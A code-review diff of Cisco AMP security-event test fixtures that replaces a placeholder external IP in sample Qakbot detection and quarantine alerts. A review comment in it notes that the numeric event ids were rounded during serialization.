found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461555300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1572,7 +1572,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1617,7 +1617,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
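Review bot: In the rewritten `original` string of this hunk the numeric `\"id\":6411488666497057000` no longer agrees with the string `\"detection_id\":\"6411488666497056775\"` of the same event, which looks like the fixture was round-tripped through a float64 JSON serializer before being committed (integers above 2^53 lose their low digits); the same mismatch recurs in the 1627, 1703, 1781, 1861, 1945, 2106, 2188 and 2268 hunks and in the event whose tail opens this chunk. Since these `original` lines are being regenerated anyway for the IP change, it would be worth rebuilding them from the raw API response with a serializer that keeps integers exact, or noting in the package README that the numeric `id` in the samples is rounded and `detection_id` carries the exact value. I cannot see the pipeline test config from this diff, but the paired `ingested` timestamp changes suggest `event.ingested` is not declared as a dynamic field; if it were, those lines would not churn on every regeneration and the diff would be limited to the intended IP replacement.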
@@ -1627,8 +1627,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103754226Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461561100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -1648,7 +1648,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1693,7 +1693,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1703,8 +1703,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103756251Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461566900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -1724,7 +1724,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1767,7 +1767,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1781,8 +1781,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103758284Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461572500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1804,7 +1804,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1847,7 +1847,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1861,8 +1861,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103760323Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:51.461578400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1884,7 +1884,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1931,7 +1931,7 @@ "8cf0ca99a8f5019d8583133b9a9379299c45470c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1945,8 +1945,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103762465Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "ingested": "2021-12-09T13:35:51.461584400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -1968,7 +1968,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2016,7 +2016,7 @@ "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2026,8 +2026,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-30T00:15:28.103764481Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", + "ingested": "2021-12-09T13:35:51.461608Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T14:09:00.000Z", @@ -2048,7 +2048,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2096,7 +2096,7 @@ "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2106,8 +2106,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103766506Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "ingested": "2021-12-09T13:35:51.461614400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective 
Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648155", "kind": "alert", "action": "Retrospective Quarantine", @@ -2127,7 +2127,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2174,7 +2174,7 @@ "5058b16a86beee96927371210b9a9f682976a50a" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
